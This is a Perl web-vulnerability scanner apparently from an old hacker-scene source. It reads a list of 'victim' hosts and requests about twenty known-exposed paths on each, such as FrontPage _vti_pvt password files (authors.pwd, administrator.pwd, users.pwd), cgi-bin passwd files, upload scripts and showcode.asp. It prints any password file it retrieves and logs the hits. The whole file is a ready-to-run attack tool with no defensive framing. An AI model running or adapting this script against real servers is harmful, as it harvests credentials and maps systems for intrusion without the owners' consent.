##########################################################################
#  This scanner searchs for vulnerable Common Gateway Interface and      #
#  Vermeer Technology Incorperated services that may lead to root level  #
#  security compromise. about 25% ripped from iisscan by Piffy.          #                                       #
##########################################################################

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

my $def = new LWP::UserAgent;
my @victim;
my $userresp;

print<<__MENU;

              NeoErudition Technologies
               CGI VTI service scanner
               
                   By: Lawrence
               http://neoerudition.net
               
__MENU



print qq(\n\n\nEnter Y or N to continue. [Y/N]: );
while(1) {
        chomp($userresp = <STDIN>);
        if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
                print "Proceeding...\n";
                last;
        } elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
                print "Exiting as requested.\n";
		exit;
        } else {
                print "Thats not a valid answer. [Y/N]: ";
        }
}
print qq(\nWhat file contains the victim address: );

chomp(my $victim=<STDIN>);
open(IN, $victim) || die "\nCould not open $victim: $!"; 
while (<IN>) 
{ 
	$victim[$a] = $_; 
	chomp $victim[$a]; 
	$a++; 
        $b++; 
} 
close(IN);
$a = 0; 
print qq(CGI/VTI Scan Initiated..\n);
while ($a < $b) 
{ 
    print qq(:: Checking for /_vti_pvt/service.grp\n);
	my $url="http://$victim[$a]/_vti_pvt/service.grp";
	my $request = new HTTP::Request('GET', $url);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/_vti_pvt/service.grp"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&second()
	} 
sub second() {
    print qq(:: Checking for /_vti_pvt/authors.pwd\n);
	my $url2="http://$victim[$a]/_vti_pvt/authors.pwd";
	my $request = new HTTP::Request('GET', $url2);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/_vti_pvt/authors.pwd"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	} 
	&third()
	}
sub third() {
    print qq(:: Checking for /cgi-bin/password.txt\n);
	my $url3="http://$victim[$a]/cgi-bin/password.txt";
	my $request = new HTTP::Request('GET', $url3);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/password.txt"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&fourth() 
    }
sub fourth() {
    print qq(:: Checking for /_vti_pvt/service.pwd\n);
	my $url4="http://$victim[$a]/_vti_pvt/service.pwd";
	my $request = new HTTP::Request('GET', $url4);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/_vti_pvt/service.pwd"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&fifth() 
    }
sub fifth() {
    print qq(:: Checking for /_vti_pvt/users.pwd\n);
	my $url5="http://$victim[$a]/_vti_pvt/users.pwd";
	my $request = new HTTP::Request('GET', $url5);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/_vti_pvt/users.pwd"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&sixth() 
    }
sub sixth() {
    print qq(:: Checking for /_vti_pvt/administrator.pwd\n);
	my $url6="http://$victim[$a]/_vti_pvt/administrator.pwd";
	my $request = new HTTP::Request('GET', $url6);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/_vti_pvt/administrator.pwd"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&seventh()
    }	
	sub seventh() {
	print qq(:: Checking for /_vti_pvt/administrators.pwd\n);
	my $url7="http://$victim[$a]/_vti_pvt/administrators.pwd";
	my $request = new HTTP::Request('GET', $url7);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/_vti_pvt/administrators.pwd"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&eigth()
    }	
	sub eigth() {
	print qq(:: Checking for /cgi-win/uploader.exe\n);
	my $url8="http://$victim[$a]/cgi-win/uploader.exe";
	my $request = new HTTP::Request('GET', $url8);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-win/uploader.exe"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&nineth()
    }	
	sub nineth() {
	print qq(:: Checking for /cgi-bin/upload.pl\n);
	my $url9="http://$victim[$a]/cgi-bin/upload.pl";
	my $request = new HTTP::Request('GET', $url9);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/upload.pl"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&tenth()
	}
	sub tenth() {
	print qq(:: Checking for /cgi-bin/whois_raw.cgi?\n);
	my $url10="http://$victim[$a]/cgi-bin/whois_raw.cgi?";
	my $request = new HTTP::Request('GET', $url10);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/whois_raw.cgi?"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&eleventh()
	}
	sub eleventh() {
	print qq(:: Checking for /cgi-bin/passwd\n);
	my $url11="http://$victim[$a]/cgi-bin/passwd";
	my $request = new HTTP::Request('GET', $url11);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/passwd"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&twelth()
	}
	sub twelth() {
	print qq(:: Checking for /cgi-bin/passwd.txt\n);
	my $url12="http://$victim[$a]/cgi-bin/passwd.txt";
	my $request = new HTTP::Request('GET', $url12);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/passwd.txt"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&thirteenth()
	}
	sub thirteenth() {
	print qq(:: Checking for /cgi-bin/password\n);
	my $url13="http://$victim[$a]/cgi-bin/password";
	my $request = new HTTP::Request('GET', $url13);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/password"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&fourteenth()
	}
	sub fourteenth() {
	print qq(:: Checking for /cgi-bin/password.txt\n);
	my $url14="http://$victim[$a]/cgi-bin/password.txt";
	my $request = new HTTP::Request('GET', $url14);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/password.txt"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
	&fifteenth
	}
	sub fifteenth() {
	print qq(:: Checking for /cgi-bin/handler.cgi\n);
	my $url15="http://$victim[$a]/cgi-bin/handler.cgi";
	my $request = new HTTP::Request('GET', $url15);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/handler.cgi"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
  	&sixteenth
  	}
  	sub sixteenth() {
  	print qq(:: Checking for /cgi-bin/handler\n);
	my $url16="http://$victim[$a]/cgi-bin/handler";
	my $request = new HTTP::Request('GET', $url16);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/handler"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
  	&seventeenth
  	}
  	sub seventeenth() {
  	print qq(:: Checking for /cgi-bin/files.pl\n);
	my $url17="http://$victim[$a]/cgi-bin/files.pl";
	my $request = new HTTP::Request('GET', $url17);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/cgi-bin/files.pl"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
  	&eigtheenth
  	}
  	sub eigtheenth() {
  	print qq(:: Checking for /msadc/Samples/SELECTOR/showcode.asp\n);
	my $url18="http://$victim[$a]/msadc/Samples/SELECTOR/showcode.asp";
	my $request = new HTTP::Request('GET', $url18);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/msadc/Samples/SELECTOR/showcode.asp"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
  	&nineteenth
  	}
  	sub nineteenth() {
    print qq(:: Checking for /msadc/Samples/selector/showcode.asp\n);
	my $url19="http://$victim[$a]/msadc/Samples/selector/showcode.asp";
	my $request = new HTTP::Request('GET', $url19);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/msadc/Samples/selector/showcode.asp"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
  	&twentieeth
  	}
  	sub twentieeth() {
  	print qq(:: Checking for /session/adminlogin?\n);
	my $url20="http://$victim[$a]/session/adminlogin?";
	my $request = new HTTP::Request('GET', $url20);
	my $response = $def->request($request);
	if ($response->is_success) {
  	print $response->content;
	open(OUT, ">>cgivti.log"); 
	print OUT "\n$victim[$a]/session/adminlogin?"; 
	-close OUT;
	} else { 
	print qq(Not Vulnerable..\n\n);
	}
  	$a++;
  	}
  	<>